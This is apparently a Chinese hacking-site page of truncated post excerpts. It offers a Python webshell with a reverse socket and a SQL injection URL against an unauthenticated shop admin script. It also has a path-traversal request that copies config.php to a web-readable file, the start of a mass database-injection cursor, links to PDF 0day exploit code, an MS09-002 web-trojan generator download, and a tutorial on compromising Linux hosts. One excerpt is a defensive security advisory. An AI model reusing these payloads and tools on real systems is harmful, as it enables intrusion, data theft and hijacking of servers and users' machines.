python版的webshell。1.0版本的功能有：1、文件、文件夹相关信息统计与操作功能，比如：列、删除、复制、读取、创建等等。2、服务器信息查看。3、执行自定义python命令。4、socket反弹。 这个周末随写而成，界面清爽:)，目前这个webshell使用起来还是比较爽的，我没加上文件的上传与下载功能，因为使用python进行基于web的文件上传下载我还不清楚如何进行，目前想

已经通知了官方，今天就发出来， 首先syssite/shopadmin/order_service.php后台这个文件没有验证用户身份， 重要的是$v_id参数没有过滤 syssite/shopadmin/order_service.php?m_id=1&key=986078fbe1474d61464d08535f1002a8&&v_id=1+and+1=2+union+s

换换风格，换换心情。

无名发布SupeV 1.0.1是discuz旗下产品一款视频播客系统漏洞文件：api目录下test.php漏洞形成，直接以get方式请求 api/test.php?thumb=../config.php&vid=../../1 api/test.php?thumb=../config.php&vid=../../1会把config.php复制到根目录下1.jpg&nb

前段时间在A5论坛的一个朋友的数据库被批量插了。留着以后用。在查询分析器里打上以下代码DECLARE hCForEach CURSOR GLOBALFORSELECT N'update '+QUOTENAME(o.name)    +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.nam

下面这个是老的。http://insecureweb.com/%20/newish-web-based-pdf-attack-in-the-wild-with-real-exploit-code/新的pdf 0day 在这里http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.htmlMaybe you read

最近那个MS09002的漏洞，闹的够火的。现在发个生成器暗组首发的，功能自测！后果自负！ 点击下载：MS09002网马生成器

近日，一项由国外研究人员发现的Adobe Acrobat Reader零日漏洞开始成为黑客攻击的实战目标。据360安全专家石晓虹博士介绍，一些经过精心构造的恶意PDF文档已经在美国等国家的互联网上出现，一旦网民打开这类文档，电脑将自动运行远程控制类Ghost木马，从而成为任由黑客遥控的“肉鸡”。由于微软和Adobe公司尚未发布相关补丁，360安全中心为用户提供了临时解决方案

适合读者：入侵爱好者、普通Linux网民前置知识：Linux基本操作投向Linux肉鸡的怀抱文/图 密界寻踪    很多菜鸟都在重复的玩3389肉鸡，时间长了自然就腻味了，非常梦想得到自己的Linux肉鸡。今天我就写一篇关于菜鸟如何获得大量Linux肉鸡的方法。需要工具如下：Ssport，下载地址：http://count.skycn.com/s0